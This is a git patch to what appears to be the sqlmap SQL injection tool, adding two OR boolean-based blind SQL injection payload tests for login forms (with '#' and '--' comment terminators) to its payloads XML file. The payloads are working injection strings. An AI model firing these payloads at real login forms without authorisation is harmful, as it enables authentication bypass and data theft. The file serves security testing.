From 95a3f4b52fc44eacabee3911372e81f37b5eb8e7 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Fri, 3 Dec 2010 22:58:35 +0000
Subject: [PATCH] Rudimental OR boolean-based tests for login forms

---
 xml/payloads.xml | 35 +++++++++++++++++++++++++++++++++++
 1 file changed, 35 insertions(+)

diff --git a/xml/payloads.xml b/xml/payloads.xml
index 1df874b40..0361a1863 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -424,6 +424,41 @@ Formats:
             <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
         </response>
     </test>
+
+    <test>
+        <title>OR boolean-based blind - WHERE clause</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <request>
+            <payload>OR [RANDNUM]=[RANDNUM]</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>OR boolean-based blind - WHERE clause</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <request>
+            <payload>OR [RANDNUM]=[RANDNUM]</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+    </test>
     <!-- End of boolean-based blind tests - WHERE clause -->